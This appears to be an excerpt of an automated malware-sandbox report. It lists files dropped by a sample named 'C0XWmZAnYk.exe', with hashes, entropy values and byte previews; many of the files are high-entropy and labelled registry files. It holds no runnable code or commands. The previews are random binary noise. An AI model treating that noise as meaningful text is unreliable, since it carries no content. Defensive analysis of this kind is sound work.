              Preview:......K.O..[~+q!J..-..J...oR......]............^.M..X..D/..%]n%.*v..}").z.'z....U.E..BS=.,A.)%.fi;u.c.....5...@...3..0>.{..vE...9~.6./.vB.......aN..3... ..\yu...2.pc2.-..2.[..'......o....^m6.:;.V.s..~.X%...M..Q..`.t.'....uD\....IU[.j..b.J....9?.8!..M1.-...7..Q>:?.o.....z...-...1gh./..~8.h...i..F.....M..\..4.j......*..3.Bh.".\...r.W..V[.-....I.N(...Q...9%.%..-(es...........NM.....T.v....^....!.a@|Nq.W<.1.....`.m..bp.dZ.8M..."93u.0P2.+.~..n(......A.u..EH_2.zB/.....R.1l.*_...#..%.....Q.F./].k..5..'Z.s..`7.....(..F.4.$....]=.V.z....\..T.W%........\..O|..R.S...'....KM.MN......../..6tB..../.'y...?....b....w.F>^.j.....+].z.G.. l]:...`...._.Bv....$P..D.B.7.2..i<Q.. v.p....x.....M.;@fpn...|$$tg.Y@6.ml.v..._..q+.Bp...:D.l.....(h.-.;.D.#.;P..%.[.*.....f....S.....(...S.*.^.a....`...x..cb>.:.).".....i...".7K...v).da{r...{...Fm....#.._..nz]6........c.2..<...0../(..~y.....U..3.....U0.y......)...c{s..T..A..O+1.V8.r.%b...GDl]\9.g...%M.....6...".....K..{.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2080773418179445
              Encrypted:false
              SSDEEP:6144:5wUqnWt/Edj2nIpVLtqsStVf2gqCWH6/5qhg:5kn6ch2nIpVLtqsStU33H6hj
              MD5:14DC4B9BBCF0897AEDC198F4300B88ED
              SHA1:156BF9DBD3E780AF80C7E77655C00D68AF1BA1FB
              SHA-256:3F2C8B700A941BCB05BA19E9A51FF850314935E7CB198ECFB4912CFD373C6508
              SHA-512:68807F7409750A162E40BE5EA6DBAD4B69AB7B994D737CD004DC249B9348AFF2BA12CEB3315947DD31A04DFD7BF35299871CF1BFB485010B1C21BDCACE882E18
              Malicious:false
              Preview:......K7.d.Q..!....I..m.T....VM.. ...8wP....c.9O......KE..-..~..?...Jz.....T%.....A...w}l....!A7......h.....\.@.a.I.c@g..P-...e'....w2g.Ow.z.5x.......r..+...2c&z.........6...........LQ.....g.....I.g>.X.........(...E...[....E..F&.2.....4..I......).H...B.....'G||...%..i.\.3.....}.V..@.w."n....9...U.e....#.Y.0...@..-.~.\O.XC...T.......dc..5)v.....J.Q.+.T.h,HL...'.|.....sQg..}.|.L....A..>.Ad%....xo.....#Y#.rk.%7.....r.........%........)..N.8..l*I....w.:@.....]Y.PL.....$\.A.%.$N_>.eP.K&.q@z.i}k...E.4=..z.Q.?r5...;.Y.(V..xy.%......0..-.Yw...A.hE..F(A..o..=..q....jq...~..Z....8.....O>,e..6.5?.(.9...}.C.O^...B.....&...6}Z<9..03e.}.^.W.7...g.G....0.y..J...]j.9Ne%...T@...i...m.....8..cvZO.1hv..Y..4..L3LW`[......*..~F...=M.j....F.J..I_+B..NZ9e.1...iYP.V,..t........../.......y..3...uxZ..(n....j.........B..dt..e...].S..?....v+H.A..+...T,.&..Y.....{.v...V.$....0..u....I.|},..L.Z._^C.}.....].Z..G..U..-......Km.L...x...'iy.Ra..E..1){...m)VR...y.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.1980329090668445
              Encrypted:false
              SSDEEP:6144:XiUsW2UenQP3WYnynLRPxMxc0+qFJaohDNdrjBmTu47OYPRUVRnqdKgaFt:pgxOonN5etYRw7bFt
              MD5:95518C0A7C5D4F2FF2DAEFA800113558
              SHA1:D2A9B3036D44CB88D676061BA36A59CBF4660161
              SHA-256:4218694E69F6F240E8FD602891DFA0A32184817FD4FFB7BDCCAAE31493D319B2
              SHA-512:7A2090376D35321D4F7300160F15F8FFDC61445AC110AEA2A58249C9C4C72212F7767EC0A829922832DBF2909D28B7AAAAE985E6ABF11B128515A2D420B883BD
              Malicious:false
              Preview:.!...B....s. .......xQ....;...K...}Q.....8=....)2gK...-|.`c2.z.&...0?......$1.&NQ...H...K...L.*..T#.g&.w...J...H.9Q..1=9z..JDC.....A...k._....9aw.|...=......h..mv...A.q.Tf/..]!....J.]...B"A.u...3.<..a..l[C...}..Z.F.s@.0.7y.H../.,c.....Q.?...%rA$..yK.`.....*.......z...d}....Y.`......j...F.../.\.'{.-4u.[P.%..cDs.|`...r.#.-...8f.2(./..k....ppM{...j`...K.4SB.4..HG_....9.0.>XC....c..G.-.E#tX......)...L..a..()^.....h.%.._....%S......N.....=W.Z...qw..&..1Q.I........o.%..._y...[&.1.U......$.L..)...o..>...o....,....v.._W.*c.2_.....#Nl.....h...c..1.:..}..Q.... ..ZI."e].HCT..c.A.d...fd.......`.....\...v.>....D...tP..J.K.w...g..>b...J......q..c.3..B...&n^.&...3.....].A..D5..G\....s....yz5?...f..N...o.D....-e.o^LH.2d.P.8h..1...D.k.q.)p9.d..m3..-$...4..(#1......L...`>..5..2].a.f.<5V.t_.+>.`.2..;7..)^..v...].....=...B.$`.......w..P.....p.@....?.L'!....^...Y.r........&m..Q..1..0.EYw.0-.9....%.Q.....7..*.{..E.Zi.`2.j..@~c..Y...$..G......|.......sy..U.....B
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979537753618869
              Encrypted:false
              SSDEEP:192:fW8b2sjR7fV66QMlwl3yoSzhiyfVDXkCj35Rh+CNE2Tp:fBHRDV673shiyfVPj35RoWTp
              MD5:F038163509AF59A622416581300BA289
              SHA1:5A86D269ACE2A67CA5DCB4322427B0A787B9BA57
              SHA-256:9A8ABAE94958883515AD0D4E5AE2DF24E5A54DD3F00AFAD2D99E3261007D31CD
              SHA-512:724098C2B45F9265D0526627535EE4184A4F3DCDC5D7121905517918B9C831AA9EEA4E5FF27C929C889A665A8766E3F8523942B8B00BC67727F0D01A9C15FE13
              Malicious:false
              Preview:regf._..|.v..6...*.v...a.D3<u......8.b....c.i.Q\0,oTW../D..|.K0...v.......0....|..4..H.a..P8...I..n.s.>d...^...E.....:.C..>.40 8......=..9...x.@8z..J..~.>.1..=.)...`....<xz..(&.......Q.....}.D}.....l[........K...o.@.\.....LRi.S....O1.d.....9...`.u5.K..U}.`......'..C.....+c.S.(.G.......Zt.i.8..Z.,=%X~OX.r......".^1z.A.....[.....R. \"P'<B.7g....~$....i.G.3....4...'..........o.....WE(./+.}...A..../.b..8WH$........)M....n<$.N...Q....'..v(.Y....#/.s}..Pr7.";X..,....V.pt..........^JY.%.....}[x..3..u.,..S$.5.O|....Z.vW...BX...d.Z..`..~..........0.Pp.-.;s..'3...s..4...._...^...4G..g...EI. .;9..)c..L%w.5.....F{w....rVp./*h.U./.*.\..I..6.Q.`a..w.......V_b...|...G.6*...i[..,S.|.m%...DaC.D...h.E.'J..L...z|Y_E(nI.e.:5..T..`....g...m..9.....'M.<...%.u.......0GoI....jq9..rZ..@...'.~......^w.....rd.;....|......[.fw.Gc...Y.)=<fk.2.vcR.4C..k..1hx.d......i.xq.......5.r......"_l......>U+(S...E8k....qe....g.i.9..PpM.@.Cf.;.. ,....e.l......(..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974677325622133
              Encrypted:false
              SSDEEP:192:qScJngWMTdbBidShDeQeMHi4pIbDHZ1L2l1c0Ni5c9VfW:JW2dbIdkri4pIbD5B2/SgfW
              MD5:EBBAF98C22911CA782DE09A615AFAD25
              SHA1:587A88D6F755D509E5471CE957E3362EAFC25284
              SHA-256:77FFE3723C1AD17C2E2DF559E0AE9AEE6585186EA20915B3A4BEF40FAB5FEAF6
              SHA-512:08ECF11E3B79BC5A030E55329BCDECEC60A951326D09FD5DB3195186E55ECD8FAEC430459A53532D714C23C69F104669B1F25BE27B54CD907E72C44EDD3C1BDC
              Malicious:false
              Preview:regf....n.F.........`..-d......\...I....VC#CS.a>.D.}.....)uj=.#SsYf....~......&../.S....B..7...V..~}z.vY}..;.?...../V.$.K..'...DE..4U.3:..x...A.Y......^ 2.(C.K.2..ya.o...|...r.G..h..m...O...6v......B(^c...D..m..<;.~J.0..=E.<..dr6X.hrp.^.....pm...y}.9...d.K.;x|...g#...I.7>.HB.t.@J..Y..f..l.0.s......=Ch.....%pi...f.3.0....t..h.-..{.....hQ.-...!c.._...=.)8..+8U..b..n......0..7...E../a........Y|e>`.c..J.;V..YQO.L}....kE.._L..U.....D..p..#5.F._...*..E..1.~..x..JTsC...W...9.Sk.pI.Z.....g8...x..V..(.,......G..P~..?.....T....7+....T.....IBN.|.Z{.M,L.H.G/p....9.......(.`..:k.S.._..s....<....5_...`...<3......~........AF..LV.*...*..;.!.*.>D...y..Gu.s..`.8....%.(.y.d...kbA.....=So.<.1.v.....C.&H....~..............d..._...~..^.."...6B.NtyVO{....../.WM..a?.Yp.#...(&...Q..FW...+....Iyj)........ B...J./..n^......].V..a$d9.Q.....z..@e..P!S.....3.)....B..%...Ti....4*.R..K/A...y..<I.2.r.hz.C.s.H.y....&t.....b8....H..?.x........8oV...U~...f^.......z.JO..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979721951516337
              Encrypted:false
              SSDEEP:192:K/Ig1qlzfKuXwtKHJbUkdWgFEINy8NKne/PhyVM5vHG:K/9qxCuXDpbRdPjNnNKeUVM5e
              MD5:84ACD5E3139179ECBF3D6ED925888C38
              SHA1:903B4F87C398EA9D364263F32C74775529D2F040
              SHA-256:3755B0F492F69269422595FBA5355229B8285758D3F60A83A6FF342AD41BA3FC
              SHA-512:06203C416620B4E897EC9B159FF969C15A90B74E2DB17D7FD613D45CDB4CBA2E9BAA68277DC150553EB867F60F48B1EB709C8FA9E8C547CF619B0DD74930D0C2
              Malicious:false
              Preview:regf...i7.&./..c......Z..hW...m.....s..+.....z.Y.+~!yc..'......7.k.l.S.,........N*(l.dCAw.U..z.T.BJ..s....n..'|.......dutx%i.....]..T.3..ao.........c.....gF......W.Ab$.+^..4.T..._...A.(.O.R..Y.?zp$i.@.#o.9.1sq.v.-.|E..QN...*Oj...ql...S........a.yuy......2....[.s........E......I...H......#.t_......<..7..xFvUH.K..v.......^..n,Kt.?m.Z.(L....v?....$..<.c.#.k.._j..........u~...[....&%..{.....%.|o.....5..1.C.o....\........R.7..Y..^XWL.T{....o..AM...s^5...b7..P............w...'.Y........X...T.....(ay......T.......\...QE._......U5..l......*...s...G........6O...G...v.......5.....$.+.dFy.IR...w...t.....c..3um...I0.MY.@.n~....N.@..$..%.up.$Z.T;.%..U$.3..6B{.....(..RF...v0.....Dq..^[A.zM........z.'..r>h.AsJ2W4....x.(....%T..@c.d9..~.=.{L...v2\h.[.h...p....|...4..6..+...sTK..a.z.L.&..."....N..@F.D..#*...J.A[m..u...M#....?..I.mxl.]v...lG....?..S..3.MvR...R.x.....S.G\#$.....\..j. .M..L..s...Z.#1...h%.e.s.k]...7...a.G.=An.S.CgN..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97563028180368
              Encrypted:false
              SSDEEP:192:ld3Yt7Cba0KvhY/xeX4wdkPdWW6dBLX1MfQeE7gdTfOXLP6Obvr6LGq7mG:lA0Kwi4wdSN6dBhjewkfM/vmLfmG
              MD5:BBCAFDA99DE247CA54CDAA1EF55366E7
              SHA1:A0AA6AACA04DA33CB1FDD87A2AD9D7B0DC1206F0
              SHA-256:7E465C133427C36035518A0E4B6EA34CB820EAFBDCDE2B4614BCAF2560BA77BE
              SHA-512:67C5BA43BE841F08EF519C41C1EE6EE9765AACBA31F52575734F47DF0DEEEE14A16E2993A7FFA3BCC9A68454D192B556E8E08C3BD800EFDB544B99581EB36CA6
              Malicious:false
              Preview:regf...4N......W3..<..\....i.....90DNy2.._.......\...8.4........p.O.z..N<g.+.D...W...A.......G...Fk.1..3.@.L!..(...oD.:...\|.dke .O.. ...<.3*.r.nk.....,...T`!5p........gK.F..>v..U.<.5s.....y....k..M-uoJ...\do.^x.c%X[..!.V...<m..fw#]qq.3=.....!.....V...p:9...J.n0.`..-.....i..|kU...b.w....<z.g=...0vx..5..e.g_. d..Pu..z.C.2...xB..z....}...<.*.3....V....5..M..BP.+.5(.w...<k.(....y%.n....{ms..W....T....h...0..A.....%..T.G....U.&....D..N.....V.H.....|..O7a.@3............(B.......N..B.%@.r.....u....w{/J....G..}{..p.y.......V&~.l..U:...Q...uk...\........&.......v.._...D..C.o...!.O.u...Y...8..E2c@...Q....R....%x.a.._...i)..I..UP.M.....'ih../.....IS..E.j.W.k.........a....m....b.=n..N..Re.Z.d...B.,..{..K.0h../F...<.M.+[.e...G ..Ky.o.;...>......Z....>..bOFAsL-,9..,7%.W.p.........|.G...Z.V.F,.+...<..-.M!R..k.....Y...5.n:.Rn.... ..8..o.....i.........*e.......4.*$S...s..F.1.P.?J.P....q.^.o./.4.`w.&...U.....+..*...N...X.`..@.n.&*.c:1.?.)b.M..VXm.JB..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979749922799187
              Encrypted:false
              SSDEEP:192:PR58yfGcRjTtTxRugFgabprMbkB5XLrh7DOs+F5vSLH:PR58yucRlVRu8wADrh7s3SLH
              MD5:D04D4E202FBBBD708DAF1E609D5F7E57
              SHA1:33FA8CB8BA511706D6BC8B0125F2364F6E6804A6
              SHA-256:8DF2146FCA8FE16DEB5CD510763654834A9DF6C5908C81E3380957E667988977
              SHA-512:1B0BDBE0980A1E8F5A391B094F170B8E6A5A263229BFBC18374BEC380E6B17D6FB3431859F3AFC13FD154B3207041B2AD5514C549A33498803AE212E9E5CDFA1
              Malicious:false
              Preview:regf..BM$.i..(.LR...~.#:d...UQ......}.N....gxg...~.p...T.......j...N.EK.I.q.....V...J=..:.07.*........Wv..........b..L..j0X..`.*....>,-..S........'..n.....8.0...laf......M....O.....a..4..j...q..r....Y......uA.$.F".....9...1....cvG...[.a.05.p.@....a.L.E.?....-...E.m[..im.L.|..F...\..N....8. ."}.5a.......d.`..k.L3...y."o.2i.eR0........<........a....X.MvVh3:F.2 i..L>q<M...!.JF.,...t.].$.`~.........._...o..V...E.z....|..qoT...G.$v.$u.].c.].I.?....F.._.z.s.VI).k,.b.og%_t.$;.xln3.[..%[...2.2.D..wm0....J......C|8q..S...).).B.z^.a(..`z.0.....s.P.VC...6..$b9.D..!P..7./..EP..fa.Z.I......?....j,..)..d..D...O...z.a.+..../.w...hq.K..F.A................E....>.O........Z.../.....*.#..z. $.......g..U.B...5.R..W_...U.*.&...w..gM.Zd.......]M.W...I.29H.r........_tA)>.....j.7].0G....f.l"..G..Q.a..u.0.d.X........UI..R.......o.....y$.;q/_.V.j..Pm.>.....M&...>.o.1.......\.......19JT.0....U?..'B......(S/..$.a...`...i....+cc.T.[.....f..x9......Z...-..2..*.A..r.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978583391869657
              Encrypted:false
              SSDEEP:192:Z/ipUVIjmKY1s38q70E1N4x04QEbRJId/bu5rDp3/Lm15L2Mpz1immI/2XdH:ZtVIje1s3X0M2xvQEbTIda5HVLm/L3pM
              MD5:6579E2CC707C9E11EE1DD0BAEF09D6B9
              SHA1:20B99F5DB69259F006456CE9A40F8926E5E5443A
              SHA-256:83B55928C6AD84A89571EB05233D7D2084D3ED3EA995C123961A80E7B68AF8F5
              SHA-512:D5042878139BFAADDFE3299A8E7D889E6B009DD766E9768F75D702603CBCD1C9FE59FB18AFC579D34DB9BEDE44CD5BB509F891912DE7743B9A0F40DBF0BFE52E
              Malicious:false
              Preview:regf.......~..X.a.8.....@.j-~....=G......y|h.P..8..M.XX....*".X..za4W..x...w.l...c.......,.Fe.M......D.. .."..CR.....J{...dt.y....6..n.9...;.pC.sS.g.d..3.v...D...4.....n..z...!.....q.aS..Y.&|..h......S]......c.fQ.3SE.....3.ll%....H5......\.M..D~)..8$/.<Y\...3V}.....T8@.l.~..;..B0.x"W5....I.....f&$....o.}.7...@...$%......;.\.F.E.n't.....l[+......r.t.....O.~...&8.......m1..N.%.=$......._......qjq+.....F$1b5...C_P..rjU..ji..QV..h..,.._%....OO.....ODw.....u....)..?.f..;.5.4.k).{.y...F...k)..Q...U.......y...jd.$8).v...?..#.b|.4.E.#.q....SBRT.....`h]#..]..a.0..Y.d.I.S.j..-W.....s`...6.TN8..)....<....ji..W4..=n.S.....^<.bz...U.s=.dB.G..=..G..pH.....l...-...$.1.80..!..+.4_".....4.@..3S;...<.4f'>r...Vp.v.o.0.E.......Jf..=....(&fJ<<..C......2....1. wN.k.S....)....O..j...C<3.S<...&J..q..(..z.].Py..Vm#.k.1....``d..+....A,..'B_..j....=..GQC.2.}v.`...\.5u'=.F......e.d#C...X..(6!...EyC..6.R.}V.0..h.d.~KE.u.L...../...%.....+H'j...P. ^q.o.'.F8*1..(
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97593053450736
              Encrypted:false
              SSDEEP:192:9/2OYFgnwUiKG9GzGx8cJXbjDAFHoUP4kZH0TqD5LcFBaTUWrzeB4r8IjDivN:g7F+wjKGYi7bXCIUQkZHD5EBaNiurVi1
              MD5:0111DF8F2000631191592852E56D3AF4
              SHA1:C754E069EA5B31569BD3B144B127423690FD802C
              SHA-256:635AF84657998C4B3F0114531E0232FF2430609D72F7792F79D946777C156996
              SHA-512:C27BAB0538F136E0F2CC70402CEE45EE3D919BA64A955A0F1B554BBA9DA11987760DC3FAC3D722EA16563EE09D600C02AD5EDD4ADC3CEFCD4A30523B087BB881
              Malicious:false
              Preview:regf....D.g..mP..a...^Lh..o..J.Q.E.u+...m-..%.....Y...V.....i.%.(~.K..LD...)..4...=.*...9}...t.2.n.....e...h>lA...7W....Rn/...vn..8..x...5..Y.V.*.D..!E....tx6<.f..|..L...1'.*......2..Z...|@.I..PP..<....sy..[......*H...(.|w.I..x....ER.*.\527........p..G'....g.?...Q....UFYW.L8.i.B.KFf...H...P.}..Y.b..................dxZ.-..B.4.;...r...Z$zn..L..Y..%.........B..%..Y...M.E/ T[:...*.H.\..V8..4<.i...^..W.J.;a.....9.C/M..`8OEz%+.t.Dl...,.W.Y...%^..W,f...........0..q.ox.'y.C...^&.8..l..4.'...M..C.Z..r.Z._o..i......B...r.g....L..3z.D.v&!w...m..\.W..>.(C......."z2.I.....].e..3..d...m....R.Z.......Ic.........[4...o..G.dm.V.P..B.7...S....kqQ...}w..h.bv....C...(k..1.....M....1.yq%;.KN..1...@......Uv....1..,......k.......{^g..tr..M....%..NV..!..S.1v...h..2..yt0j.v...Mz.L}..k."...g..l...P).Y.tVgz.D..f..,.G.).b....F..7.k..$/.....>_.:z.....M......~..I..%./.?...a...&....t.......g{...n..Q.. SC_......U.3.X.<..........i.x...k...*...&\ %.'.qu.?-X..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975780702467655
              Encrypted:false
              SSDEEP:192:NlroiO6PXMMp63PQOICbLOrAUNmv4OKkehx5pYCqUZ0fk9VVmAeBoDkeMhb:bcdKX7p6fQOLL2PNmv4OKke1p70xBoDC
              MD5:67F039680140CA4C931DEDB4B1A196B1
              SHA1:A449AAD7F1DC8D65406EC2030A45F686C142F00C
              SHA-256:7F8F4D3739594665C0293F73CBDAF87873A3384628F60B77983FE4822E0DEB02
              SHA-512:0C546A44AABE1375E15C56D3FEDBAC40FE028D6B68742BBB369FCCA51C97F37924102E8C7756AD3576DDA5B389B7ECE0FA94557D6DC031CE5DCE6D1A2E994DA9
              Malicious:false
              Preview:regf.........,v.I3...!^......?...g5.E......8......]M.XTy)4.jx.C%....>.W.V>qT..9(..z...I..k$..h1."7.......d.{.&v........E....x.*.z..YsR..B^.{...g........2.H:X%......kg.. ..C.8..wR........=.'...b.#.L..x$d_......,......L..k.pq.^.K..W....9...fg]a..,IxW..C..L.xb,;...L...xG)P.:y..-...-..<... G.?.IZ.8.../......*&..T./...a...v;..%...c...b...M.X....|X....G9...)....hZ.....r.nS.;.k?.8.h.DTV.1.6r....>.........c$.F...P..UOP!..,#./a....._.6..?.~.|..}....mr.e....4..e.<...3......1....iH).b.J.m.[m._...S..nE..>.@....K,.Zh....,..m$W..wT...E".V.Q..r>.Z.".$...:.^.#L;.E7!...@uH]..Nk..U.....U@. .fI.e..I.......<.`4..b...}.c...1Q.2.8T.8..\..W...!"...%..D1..f.4/"..;0J.L5&R7....)..{a...N.r...}.c...T..N.V..V.....K..K.N..O.....*...W..t[..t^~.p...p1...#....4Tz..<...........y_.;..raL@J....X.%.......b.T.&D...$...|........0..X).u.`........c.Z.;...[.y....^`.&..n&.})....j.Hqo$.qb.(N......!.m....7.<.`;.....g...h.....[...`...?f..(.n.?.G=. !.Ha.2..t}...^.^.B...l..L$bi...M.>2.OjK!..I..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981393643081816
              Encrypted:false
              SSDEEP:192:mFIo5ww8EU87ysffBALDHXSYm+cxLqZ167/PNGYB1Ba74BZwb:mFIoE/Oys3RYlcxLO67IYTBgYa
              MD5:5B6588C7CFA36CB805DCDF79C738B828
              SHA1:98A611F823376A37182E238A3EC6B26F56791FCC
              SHA-256:233F5766D81B893607E60244421FA4C6EF6F77712FE23C179C12D501341BD3F0
              SHA-512:D582892FB800E5C63DF0356402BBFBA2CB7F9448A9D2A8B8F7AC927E5073935DACED2703848AB2640C8ADB71BE781373E69E431295A0CE551EDE4A33AB54280F
              Malicious:false
              Preview:regf......4...C;Z;#.*..+.A...L....{'..=99k.2.R."..S.Pc+P.!}....c.q..."..JZ...m.Q...r0.%+f.jy4...{..A.I.h.....W.-.b.DVw....T...8..\.rL$.G.)..r..........f...<...yl...+. f.L.X[..H..<.u..) ..0Wy+=%m=........$..../."<.U...j.F..28h.2H....3..}_..v..b....5N....1..?IP.}4...;.q#d.g...G..z.`..\.mb...7w.....W..z.>..8.5.js.F.C@.s.. .;p..D|.1...q$#f#.n..I.N. ..'...\k...>......M.....c.A..A..{.....#....2.^y....U.*...m.9.Z.....8.kppibj..........8w...L...~.]..oleSM.E....z.K...Dz.......+...Lv^"Z.....2....y...c.P..........8P.X...s....|.. ..RV!..c..U...@...{.2/Y..@.M......%~.h..p".y>..U.Z4.S.....a(...(..h....{o"....X\ ...-K..A...!p..gV.......@JU.NH..8...EV.K..H.jE..}...$m.....9qty....y.vk7.....:..:#F.%j..... ....H....~...[g........6S$F...L9.Ml....Y....)g-...16.:.BA.>&$[.18].p.......D.......l.}..TK._kvF`.o.zf.0H..,.....#f3.[.3..L9....UD.6.Dm2hc.{...o.......4...$|"J.M.d..Z.V.`~....<..1...|B.W..8g.Q.uO.q.j.V{...ts.W...dD&..C.AU.p...&....u.^..P3.../%f.5Y....o..{*..h
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979073204907418
              Encrypted:false
              SSDEEP:192:vg0CS3Cl30g/WFiYiNmXjjw5/UD84drmX2dZ2qMidM0P:vg0CS3dg/WFFjs5/UD8IadeJP
              MD5:63BD8E787398B8958CED6B79C4913D98
              SHA1:C517B19286C949755B6B1B83C5A454CE2EC15286
              SHA-256:68FED2B004BBEC299798C2A0037DACDEE66E5529D0243B4864132EC9FB193143
              SHA-512:5172A385B2D367A62D3627A1570A0170678D1ED4E61377506CA8E3267709D21ADC3CB41B3C8360E0D7B7E2BC53451B3E2977BDFAD7A6F8EB901C74CA6C4B114C
              Malicious:false
              Preview:regf.d|._.U.\...;\I..D .fB..cO.@9a._.V..,..e..1?..<......$......Z]R..C.A..[}>c.I.H.......@%......yR]j.e..1.y.1r...gq..:.b....:...![.m.jY..n-U.I7P.qZ..qd...Z^iG..0.......-....n.<.I(......\Az=.n....c....U...7.dl...M..o....'.Mj.lq..mtd......P,.ve....G...%S.K.....I0.9.8.....d...PIhO....1..e..J.<1.4@......w9 ...i...d...d..b.....9&!..~-m.....z.............o1......I...g.o.%4..ypCb..[.#`.E9o[`...|...2.t.;..n....(..8.+.d.c.s..C.;...........b.jf"m./.>`w...{T:)..^.e .`......\.[w....K+.PA.._X...!..g.....;...L7,...e..:........,....E.6...:h.t.x.......as.T.M..yE5....?.(...C.2U..z...=..r.$......[._.....{b....y...r.,.[z.....]......g..X!.p'.D.AA......Q>r...;H.D....t3..t...n.u.+......P..Y.*g.....8x...\............K...&......5e.D..`|.$2B[.....Z.'f.k.33..R-....cUB.,.B....XJ.:.....(kd'?......7....V..,...z.d.....".......6|...:..N.....J.N/.M.3|L.C..Ww@.. .N.l...^.....].a...k..m..-..;%xf..W.....P.H...9g...6N.....t.O.H9&.".....<..J.C.....k..5....,..e..9.E...d
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978984212732948
              Encrypted:false
              SSDEEP:192:RZkd51yZe1INcRE/VyXrfitqLFiqrpdpqzH6PUdTDIKbf:RZGN1EI7isXHpwaPYTDrT
              MD5:1D28B316970B63A4A6E5C80B08250903
              SHA1:B1A7A72BF73F3CBF683274355C052B4EA71D9B9A
              SHA-256:E1BD937F304351BB2636662CF0D10ABA2CC1E407D8231B4AC717F18381723B0C
              SHA-512:842B0DA1BFA253F548957FFDBB79F6DD5D24F445C867A966D83A9ED56E32D1B83425001DC407FCA96EEABC95454A11248D969A5494499C0BB0CC90CC9FF7852B
              Malicious:false
              Preview:regf.Sa......j}I..."...p.m...aR7p.......N#....9YuJ.5.'.....u....8..3.......,.......Q|.`..Jb._.D..m....N..R3.y6E2...SUF..1]....$f.z.U....!08....<...J.....~.z^*D"p....._..;`a7h..F.....|....`C`...|.&.`..G.E).......Q......`s..U.w$O.6.."..H..'..+... .>.]...{.dQ.cx.;.]../z*uj;B..L..B.Cp ..IK=..iW....J.R......`m.....\..].#[...q.S.?....1....Z.....7....elX.2...x..h.%..;.4.v._,..]...gF.M..b.....$e....>Q..Ir..~..ud..`..Y.wu-..o_.!4.b.1.....s.H.!..A.e.....@.n.....6.P.s.Q..#.o..D&.?..!...44..|.&_...Y.5'#..C......=....'.....!...1..T3........O57..[.~U)-.....Zz..a`......C.Q.\..8...~.D..3...u.k?.DT....+N..l....?AZ........^..W.....A..gE..T.7I.GUB..G@.O.. ..k...G@.2.+i..h...P`G.R..&.r.#..;r....2..M.k......S....."..He7s`......$..^.-... t..b...*7.RN.a..#.....8g...._>.z.]y..."I..H"kW....../...dYu_..&......?34...9.D.Q..T]..*.(...+/e..........|.....,R..k.n.QJ.*#.[.......F.1.....'..>.y!..^a.3..^7$.........n.pZ8.s.=..N....;.....6s..F.e..n.]..........P...7...%....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979645104933804
              Encrypted:false
              SSDEEP:192:UlDwJ2QpnrUsnobtmmaIMgoq1ekQUw7aD6dHzRXItCsazGIf:UwcE9nobtkILNQUw+DcHJ4lazXf
              MD5:3C81E1C78DC08DA7F55BDA5C0C8E0905
              SHA1:55B36ADF62FAC8C359E0C7B55AF0973EF320B7D7
              SHA-256:749222F8847B3D2A87B3AA965F537CCD2519DEE8C238A256766B6A683F594FE9
              SHA-512:2052D3FD00A9836B24A7E898CD8CC984174A7F31679630270CBF103E0DDA4EB300945B0F4E5D4E232DA9E5ED6B1C5EE167EBE369F377356CBBAFC335F1D89CEA
              Malicious:false
              Preview:regf...G.5-...\..t..s....b.:.w...9.+..v...(....%..rZ.K...B.(.0V". .;....=.lK.4..Os...f;...}...:.....Wt...~..KV..C.K...P...l._...;y..B[..B3.=..2a.'.>..b....v..MI...R.US.....{.g6...^...y..Ni...`.......%:...ov.....j*@..M.Jt.;.....|.@$|&d....D...|..$+T..H.<hT..l..\.s..T.....5H#XRz.W..jI.q...wi..2.=.g...>.f.w.1.I.\.........:.K...d.C..QV.t.<.<.....Y./.l%..DD...3.5.C..;.VD*R''.uGF4.<z....0am.....E....D8-4..9yA{.3sL.Q...-v...>jk.u...>....d.S.f....Y........V.)...%...21.p.F.]P..l5.E....O|nr...x.......S.......'R3b....N.\k0vr.c.b..p...;.1.....{..*...)...sp[D..}......y.s=...6.g.lQ$.h,...7......9....gU......"M.V.6~.....I......{T....{.~M.E...G..3.MZ.8....1..G..R0....e.).'i ..`..'=.X......x<...shI<..hi......$..{M1.....5..EuA.d/.f.'cl.iT....|...W.M...F .^.W.D...!.').....0...dV.0.=.2............$..t.!. .i.d....(.....X......g...:.K.z..\*~....d.+.r.....,...fe...E>...8..~u.O.[..,.v......%..c.j.....Fh.....>.]..._....;o.Z...7..r< ..T..mk....W.,.!9.. ...l.j,*0..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
